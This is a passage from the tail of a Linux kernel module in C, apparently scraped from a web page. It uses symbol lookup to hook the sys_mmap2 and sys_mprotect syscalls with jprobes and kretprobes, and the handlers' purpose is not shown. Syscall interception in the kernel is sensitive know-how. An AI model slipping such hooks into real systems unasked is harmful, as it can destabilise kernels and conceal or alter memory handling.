|
out:
|
|
jprobe_return();
|
|
return 0;
|
|
|
|
}
|
|
|
|
static struct jprobe sys_mmap2_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mmap2
|
|
};
|
|
|
|
static struct jprobe sys_mprotect_jprobe =
|
|
{
|
|
.entry = (kprobe_opcode_t *)kp_sys_mprotect
|
|
};
|
|
|
|
static struct kretprobe mprotect_kretprobe =
|
|
{
|
|
.handler = rp_mprotect,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
static struct kretprobe mmap_kretprobe =
|
|
{
|
|
.handler = rp_mmap,
|
|
.maxactive = 1 // this code isn't really SMP reliable
|
|
};
|
|
|
|
|
|
void exit_module(void)
|
|
{
|
|
unregister_jprobe(&sys_mmap2_jprobe);
|
|
unregister_jprobe(&sys_mprotect_jprobe);
|
|
|
|
unregister_kretprobe(&mprotect_kretprobe);
|
|
unregister_kretprobe(&mmap_kretprobe);
|
|
}
|
|
|
|
int init_module(void)
|
|
{
|
|
int j = 0, k = 0;
|
|
|
|
_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
|
|
|
|
sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
/* Register our jprobes */
|
|
if (register_jprobe(&sys_mmap2_jprobe) < 0)
|
|
goto jfail;
|
|
j++;
|
|
|
|
sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
if (register_jprobe(&sys_mprotect_jprobe) < 0)
|
|
goto jfail;
|
|
|
|
mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
|
|
/* Register our kretprobes */
|
|
if (register_kretprobe(&mprotect_kretprobe) < 0)
|
|
goto kfail;
|
|
k++;
|
|
|
|
mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
|
|
if (register_kretprobe(&mmap_kretprobe) < 0)
|
|
goto kfail;
|
|
|
|
return 0;
|
|
|
|
jfail:
|
|
|
|
printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
|
|
kfail:
|
|
printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));
|
|
|
|
return -1;
|
|
}
|
|
|
|
|
|
module_exit(exit_module);
|
|
|
|
----EOF----
|